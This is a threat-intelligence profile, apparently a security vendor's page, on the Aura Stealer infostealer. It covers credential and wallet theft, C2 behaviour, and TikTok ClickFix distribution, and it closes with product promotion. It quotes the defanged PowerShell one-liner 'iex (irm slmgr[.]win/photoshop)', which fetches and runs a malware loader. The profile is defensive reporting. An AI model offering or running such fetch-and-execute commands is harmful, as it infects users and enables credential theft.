Aura Stealer
Aura Stealer is an information-stealing malware family first observed in 2025, with reporting in the provided content placing initial observation in July 2025 and separate identification in September 2025. It is marketed as a low-cost stealer and advertised with Telegram bot integration, configurable options, and ongoing updates, including claimed support for decrypting data from newer Chromium-based browser versions. Reported capabilities include theft of saved browser credentials, authentication cookies, cryptocurrency wallet data, and credentials or session data from other applications. The content also states it targets Chromium-based browsers and that operators advertised improved decryption support for Chrome/Chromium version 144+.
Behaviorally, Aura Stealer has been reported to inject into explorer.exe, retrieve Base64-encoded configuration data from its command-and-control infrastructure, perform theft actions according to that configuration, and Base64-encode collected data before exfiltration. AhnLab reporting in the provided content states it attempts to contact three C2 domains sequentially for redundancy and uses specific API endpoints. Distribution observed in the content includes fake cracks and keygens delivered through SEO poisoning, posts on legitimate websites, forums, community platforms, and social media, as well as ClickFix-style social engineering. One highlighted campaign used viral TikTok videos posing as activation guides for Windows, Microsoft 365, Photoshop, Spotify Premium, and other software/services; victims were instructed to run PowerShell such as iex (irm slmgr[.]win/photoshop), which fetched a script that downloaded updater.exe from file-epq[.]pages[.]dev, identified as an Aura Stealer variant.
The malware is associated in the content with broader infostealer activity rather than a named intrusion set. It was among the most distributed infostealers in ASEC's November 2025 reporting, alongside ACRStealer, LummaC2, and Rhadamanthys, and its distribution reportedly increased significantly from October 2025 onward. The content also notes use in ClickFix campaigns affecting sectors broadly targeted by that technique, though no Aura-specific industry targeting is directly established. High-confidence observables directly mentioned in the content include slmgr[.]win and file-epq[.]pages[.]dev/updater.exe.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Techniques & procedures
9 distinct techniques documented for this family, organized by ATT&CK tactic.
Execution
3 techniques
Execution
Each video displays a short one-line command and tells viewers to run it as an administrator in PowerShell: iex (irm slmgr[.]win/photoshop)
Mertens says that an additional payload will be downloaded, named source.exe, which is used to self-compile code using .NET's built-in Visual C# Compiler (csc.exe).
The videos are performing a ClickFix attack, which is a social engineering technique that provides what appears to be legitimate "fixes" or instructions that trick users into executing malicious PowerShell commands or other scripts that infect their computers with malware.
Privilege Escalation
1 technique
Privilege Escalation
Stealth
3 techniques
Stealth
Credential Access
3 techniques
Credential Access
Aura Stealer collects saved credentials from browsers, authentication cookies, cryptocurrency wallets, and credentials from other applications and uploads them to the attackers, giving them access to your accounts.
Aura Stealer collects saved credentials from browsers, authentication cookies, cryptocurrency wallets, and credentials from other applications and uploads them to the attackers, giving them access to your accounts.
"Improved decryption of the latest versions of Chromium-based browsers (144+)... Now different versions of Chrome (before 143 / after 144) are decrypted with different elevators, and the method is selected dynamically"; and "listings typically include browser passwords, cookies, and session tokens."
IOCs tracked for this family
20 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
6 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Infostealer marketed on dark web forums; focuses on stealing Chromium-based browser data and includes version-aware, dynamic decryption logic to bypass Chrome’s application-bound encryption changes (notably Chrome 144+). Includes geo/language checks and CIS-region exclusions, and uses compile-time hashing of WinAPI names to reduce static indicators.
Information stealer marketed with Telegram bot integration and configurable options.
Infostealer that injects into explorer.exe, receives configuration from C2, steals information, and exfiltrates it in Base64-encoded form. Uses multiple C2 domains and specific API endpoints for communication.
Information-stealing malware offered as a low-cost subscription service; reported as newly emerging this year.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.